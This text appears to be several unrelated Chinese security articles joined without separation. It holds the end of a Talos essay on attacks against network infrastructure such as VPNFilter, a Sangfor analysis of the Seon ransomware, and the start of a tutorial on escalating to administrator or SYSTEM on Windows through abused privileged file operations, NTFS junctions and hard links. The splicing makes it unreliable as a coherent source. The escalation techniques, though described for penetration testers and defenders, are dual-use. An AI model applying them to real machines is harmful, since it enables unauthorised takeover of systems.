显然,网络基础设施是民族国家威胁参与者的目标。我们可以预期,攻击者将会继续寻找攻陷这类系统的方法,并持续改进和开发他们用来实现目标的恶意软件。攻击者会从过去的失败攻击中“吸取教训”。在下一波不可避免的攻击浪潮中,我们可以预见,恶意软件会在网络流量中留下更少的痕迹,并且会具有更加复杂的C2基础架构,同时也能更好地应对C2中断的情况。

在当前,网络已经成为了我们工作和社交生活的核心,也是我们物理环境的核心。将人们连接到网络上的设备往往最容易被忽略,但正是这些设备,支撑了我们国家的关键基础设施和企业的运作。

通过VPNFilter的事件,我们应该清楚,攻击者并没有忽视这些系统的重要性,并且攻击者倾向于通过攻击网络来破坏社会的正常运转。然而,在试图进行这种攻击的过程中,威胁行动者已经暴露了他们所具有的技术,以及正在努力发展的能力。这些线索将有助于我们判断可以在哪里发现攻击,以及如何准备防御下一次攻击。

Talos将持续利用威胁预警的优势,来分析不断变化的威胁形势,并与合作伙伴持续合作以保护客户的安全。然而,网络安全是每个人都需要关注的问题。我们都有责任,确保我们具备足够的安全防护,将连接到网络的所有设备都进行了更新和彻底的修复,从而足以抵御下一次攻击。

我们不知道下一次重大的攻击事件会是什么,但我们会持续寻找关于即将发生攻击的一切线索,从而尽力在事件发生之前阻断恶意活动,并阻止灾难的发生。

参考文章

[1] 美国国土安全部:针对网络基础设施威胁日渐增加的现状提出推荐缓解措施

https://cyber.dhs.gov/assets/report/ar-16-20173.pdf

[2] 英国国家网络安全中心:关于互联网边界路由器设备的安全建议

https://www.ncsc.gov.uk/information/uk-internet-edge-router-devices-advisory

[3] 美国国土安全部:具有俄罗斯国家背景的恶意组织针对网络基础设施发动攻击

https://www.us-cert.gov/ncas/alerts/TA18-106A

[4] 美国宾夕法尼亚州西区地方法院:通缉令

https://www.justice.gov/opa/press-release/file/1066051/download

[5] Talos团队:新的VPNFilter恶意软件针对全球至少50万网络设备发动攻击

https://blog.talosintelligence.com/2018/05/VPNFilter.html

[6] 美国司法部:宣布采取行动打击感染感染路由器和网络存储设备的APT28恶意组织

https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected

[7] Talos团队:恶意活动瞄准韩国

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

[8] Talos团队:门罗币挖矿恶意软件Rocke分析

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

[9] MITRE ATT&CK组织列表

https://attack.mitre.org/groups/

[10] 美国国土安全部和联邦调查局:俄罗斯恶意网络活动GRIZZLY STEPPE分析

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

[11] 英国国家网络安全中心:曝光俄罗斯军事情报部门不计后果的网络攻击活动

https://www.ncsc.gov.uk/news/reckless-campaign-cyber-attacks-russian-military-intelligence-service-exposed

[12] 美国国土安全部:针对乌克兰关键基础设施的网络攻击

https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01

[13] 信息共享:网络威胁联盟关于VPNFilter的调查

https://www.cyberthreatalliance.org/information-sharing-action-cta-incident-review-vpnfilter/

[14] 乌克兰安全局:欧洲杯决赛期间可能会发生对国家部门和私营公司的大规模网络攻击

https://ssu.gov.ua/ua/news/1/category/21/view/4823#.Xa4RX7cc.dpbs

[15] Talos团队:DNS劫持滥用核心互联网服务

https://blog.talosintelligence.com/2019/04/seaturtle.html

背景概述

近日,国外安全研究人员捕获到一款名为Seon的勒索病毒,并且发现攻击者通过Bizarro Sundown(GreenFlash)漏洞利用工具包进行传播,该漏洞利用工具包常被用于传播各类勒索病毒如GandCrab、Locky、Hermes等。Seon勒索病毒使用AES算法加密文件,修改文件后缀为 .FIXT,加密完成后弹出hta窗口与用户交互索要赎金。

勒索特征

1.加密文件后缀.FIXT:

2.勒索信息:

详细分析

1.首先生成AES密钥,存放在注册表HKEY_CURRENT_USER\Software\GNU\Display -> windowData中:

2.通过ASM获取CUP信息:

3.遍历磁盘,在每个目录下释放勒索信息txt文件:

4.遍历时会判断文件的类型,避开加密包含如下字符或类型的文件:

runas,bootsect.bak,ntuser.ini,thumbs.db,your_files_are_encrypted.txt,ntldr,iconcache.db,desktop.ini,ntuser.dat.log,bootfont.bin,ntuser.dat,boot.ini,autorun.inf,system,volume,information,programdata,application,data,$windows.~bt,program,files,tor,browser,windows,mozilla,appdata,windows.old,program,files,(x86),$recycle.bin,google,boot,mod,adv,dll,msstyles,mpa,nomedia,ocx,cmd,ps1,themepack,sys,prf,diagcfg,cab,ldf,diagpkg,icl,386,ico,cur,ics,ani,bat,com,rtp,diagcab,nls,msc,deskthemepack,idx,msp,msu,cpl,bin,shs,wpx,icns,exe,rom,theme,hlp,spl,fixt,lnk,scr,drv

5.不在忽略的类型和文件中,便使用AES算法对文件进行加密:

6.加密完成后在Temp目录下释放startb.bat并运行,内容经过base64解密后是用于删除磁盘卷影和备份的bat命令,用于防止恢复备份:

7.在Temp目录下释放readme.hta文件,内容经过base64解密后是勒索信息,通过mshta.exe弹出:

解决方案

针对已经出现勒索现象的用户,由于暂时没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

病毒检测查杀

1、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。

64位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

病毒防御

深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:

1、及时给电脑打补丁,修复漏洞(包括Internet Explorer内存损坏漏洞CVE-2016-0189、Flash类型混淆漏洞CVE-2015-7645、Flash越界读取漏洞CVE-2016-4117)。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。

*本文作者:深信服千里目安全实验室,转载请注明来自FreeBuf.COM

本文介绍了如何滥用Windows上的特权进程执行文件,来实现本地权限升级(从用户升级到管理员/系统权限)。除此之外,我还介绍了利用这类漏洞的可用技术、工具和具体过程。

特权文件操作漏洞

以高权限运行的进程会对所有进程中执行的文件执行操作,这意味着,当高权限进程在没有足够预防措施的情况下,可以访问用户控制的所有文件或目录。因此,从理论上说,这就是一个安全漏洞,因为恶意攻击者有可能会滥用该特权进程执行的操作,使特权文件做一些不应该做的事情。对于许多特权访问用户控制的资源的情况都是如此,文件只是一个简单的目标。

在渗透测试中,大家熟知的示例包括用户可写的服务可执行文件和DLL劫持漏洞,如果你对特权服务将执行的文件具有写入权限,或者对它将在其中查找DLL的目录具有写入权限,那么你可以在这个特权进程中执行有效载荷。不过,以上举例的这个漏洞已经众所周知了,除了偶尔的配置漏洞发生之外,一般的防护软件都可以对它进行预防了。

然而,其他文件系统操作的潜在滥用似乎不那么为人所知了,但同样和以上所说的漏洞一样危险。如果你可以让一个特权进程为你创建、复制、移动或删除任意文件,那么使用system函数来调用shell脚本的漏洞就离你不远了。

此外,由于这些都是逻辑漏洞,它们通常非常稳定(不涉及内存损坏),通常能够在代码重构中存活(只要文件操作逻辑不变),并且无论处理器体系结构如何,它们都以完全相同的方式被滥用。对攻击者来说,这些功能非常有价值。

漏洞的寻找过程

用户可写的位置

虽然大多数特权程序不会直接操作一些非特权用户的文件(有些例外,如AV),但许多程序会对可能位于用户可以操作的某个位置的文件执行操作。非特权用户在以下一些位置,是具有某种形式的写入权限的:

1.用户自己的文件和目录,包括其AppData和Temp文件夹,如果你足够幸运或运行AV,某些特权进程可能会使用;

2.公众用户的文件和目录:idem;

3.在C:\中创建的目录具有默认ACL(访问控制列表):默认情况下,在分区根目录中创建的目录具有允许用户写入的许可ACL;

4.具有默认ACL的C:\ ProgramData子目录:默认情况下,用户可以创建文件和目录,但不能修改现有文件和目录,这通常是第一个看的位置;

5. C:\ Windows \ Temp的子目录:默认情况下,用户可以创建文件和目录,但不能修改现有文件和目录,也不能读取其他用户创建的文件/访问目录。有意查看安装程序和准时运行的其他特权软件和脚本,而不检查预先存在的文件和目录;

你可以使用特定的工具和命令(例如SysInternals的AccessChk,icacls或PowerShell的Get-Acl)检查文件权限,也就可以使用浏览器的“安全”选项卡来检查文件权限,“高级”表单具有“有效访问”选项卡,允许列出特定帐户或组对其的访问权限该文件/目录(如AccessChk在命令行上执行)。下面的屏幕截图显示了在C:\ProgramData目录上授予用户组的(默认)访问权限:

1.jpg

寻找特权文件操作

要查找特权进程执行的文件操作的示例,我们可以简单地使用SysInternals的ProcMon,Procmon是微软出品用于监视Windows系统里程序的运行情况,监视内容包括该程序对注册表的写入、对文件的写入、网络的连接、进程和线程的调用情况,procmon是一款超强的系统监视软件。Procmon为感兴趣的进程过滤文件事件,当我们看到它访问用户可控制的文件和目录时,就可以检查该进程是否使用模拟客户端来实现这一点。

2.jpg

漏洞利用技术与工具

一旦我们发现在用户/用户可控制的文件和目录上,可以执行对一些文件的操作,我们就需要一种方法来劫持这些操作,进而实施攻击。

值得庆幸的是,James Forshaw @tiraniddo )通过他在NTFS文件系统和Windows内部的开创性工作完成了所有繁重工作,他在众多文章中发表了其中的技术细节。他提出了几种滥用Windows文件系统和路径解析功能的技术(以下我会详细介绍),并在开源的symboliclink-test -tools toolkit和NtApiDotNet库中实现了这些技术。他的技术和工具包为许多测试人员(包括我自己)打开了一扇寻找这种类型的漏洞的门,让这些漏洞的利用成为可能。

NTFS 交叉

 交叉是一个NTFS功能,它允许将目录设置为文件系统的安装点(mount point),就像Unix中的安装点一样,但是也可以设置为解析到另一个目录(在同一个或另一个文件系统上)。在本文在,我们可以把它们看作是一种只包含目录的符号交叉。

3.png

有趣的是,在大多数情况下,路径解析将遵循 交叉规则(除非明确设置参数以防止这种情况),因此在上面的设置中,尝试打开C:\ Dir \ file.txt的程序实际上将打开C:\ Other \ file.txt。

连接可以由非特权用户创建,由于它们可以跨卷工作,因此你也可以将C:\Dir“重定向”到D:\OtherDir。如果你具有对现有目录的写入权,则可以将其转换为 交叉,但必须为空。

NTFS交叉是用重解析点(reparse points)实现的,虽然内置工具不允许这样做,但是可以通过设置自定义重解析点的实现将它们解析为任意路径。CreateMountPoint工具允许你完成重解析点实现,对于常规 交叉,你还可以将mklink和PowerShell的New-Item与-Type Junction参数一起使用。

NTFS重解析点(Reparse Points)

随Windows 2000发布的NTFS版本5里最有趣的一个属性是引入了一些特殊的文件系统功能,并应用于特定的文件或目录上。这些特殊功能使NTFS文件系统更加强大和有扩展性。这个特性的实现基础叫做重解析点(reparse points)。

重解析点的使用源于一些应用程序想把一些特殊数据存储到特殊的地方——重解析点,然后由应用程序做上特殊的标记,只允许它使用。为此文件系统引入了一个应用程序相关的特殊过滤器(application-specific filter),并与重解析点的标记关联起来。多个应用程序可以把不同的数据存储到同一个重解析点文件里,只要使用不同的标记。微软保留了几个标记为自己使用。

现在我们假设用户打算访问一个有标记的重解析点文件。当文件系统打开文件时,发现有重解析点关联到这个文件,于是“重解析”这个打开文件请求,发现与应用程序相关联的可用过滤器,并与这个重解析点进行匹配,通过后就可以把重解析点的数据传送给这个过滤器了。过滤器于是可以把这些数据用于任何途径,依赖于应用程序最初的定义。这是一个非常灵活的系统:应用程序不需关心重解析点是如何工作的,重解析点的实现细节对于用户是完全透明的。你只需简单的放入和拿出数据,其余的事情都是自动完成,这使文件系统的功能大大增强了。

微软使用重解析点在Windows 2000里实现了如下的功能:

1. 符号链接(Symbolic Links):符号链接允许你创建一个指向其他地方某个文件的指针。NTFS并没有像UNIX文件系统那样实现“真正”的文件符号链接,但是从功能上重解析点完全可以模拟得一模一样。本质上,NTFS的符号链接就是一个重解析点,把对一个文件的访问转移到另一个文件身上。

2. 交叉点(Junction Points):交叉点和符号链接类似,只不过对象是目录而不是文件。

3.卷装载点(Volume Mount Points):卷装载点和前2者类似,只是更进一层:它能创建对整个卷的链接。比如,你可以为可移动硬盘或其他存储介质创建卷装载点,或者让本地的不同分区(C:,D:,E:等等)看起来就像在一个卷里一样。这对于那些大型的CD-ROM服务器非常有用,如果没有卷装载点,它们就只能为每张磁盘人工维护一个分区字母。

4.远程存储服务器(RSS:Remote Storage Server):Windows 2000的这个特性能利用一些规则来移除NTFS卷上不常用的文件,放到存档介质里(比如CD-RW或磁带)。当它把文件移出到“下线”或“半下线”的存储介质上时,RSS自动创建指向这个存档文件的重解析点,以备日后使用。

硬链接 (hard link)

我们都知道文件都有文件名与数据,这在 Linux 上被分成两个部分:用户数据 (user data) 与元数据 (metadata)。用户数据,即文件数据块 (data block),数据块是记录文件真实内容的地方;而元数据则是文件的附加属性,如文件大小、创建时间、所有者等信息。在 Linux 中,元数据中的 inode 号(inode 是文件元数据的一部分但其并不包含文件名,inode 号即索引节点号)才是文件的唯一标识而非文件名。文件名仅是为了方便人们的记忆和使用,系统或程序通过 inode 号寻找正确的文件数据块。

为解决文件的共享使用,Linux 系统引入了两种链接:硬链接 (hard link) 与软链接(又称符号链接,即 soft link 或 symbolic link)。链接为 Linux 系统解决了文件的共享使用,还带来了隐藏文件路径、增加权限安全及节省存储等好处。若一个 inode 号对应多个文件名,则称这些文件为硬链接。换言之,硬链接就是同一个文件使用了多个别名(见 图 2.hard link 就是 file 的一个别名,他们有共同的 inode)。硬链接可由命令 link 或 ln 创建。如下是对文件 oldfile 创建硬链接。

由于硬链接是有着相同 inode 号仅文件名不同的文件,因此硬链接存在以下几点特性:

· 文件有相同的 inode 及 data block;

· 只能对已存在的文件进行创建;

· 不能交叉文件系统进行硬链接的创建;

· 不能对目录进行创建,只可对文件创建;

删除一个硬链接文件并不影响其他有相同 inode 号的文件。

所以,非特权用户还可以创建硬链接,与Unix对应的硬链接一样,将作为现有文件的附加路径。它不能在目录上工作,也不能跨卷工作(对于硬链接来说没有意义)。

8.png

此外,内置工具不允许你创建到没有写入权限的文件的硬链接,但是实际的系统调用允许你使用打开供读取的文件来创建硬链接。使用symboliclink-test -tools中的CreateHardLink工具(或Ruben Boonen编写的这个PowerShell脚本)创建指向你没有写入权限的文件的硬链接。

注意,如果没有对文件的写入权限,就不能删除创建的链接。另外,这项技术在即将发布的Windows 10中得到了缓解。

本文我们对特权文件操作的原理和可能发生漏洞的地方,进行了理论上的分析。下文我们接着将对象管理器(ObjectManager)符号链接以及漏洞利用的示例和思路。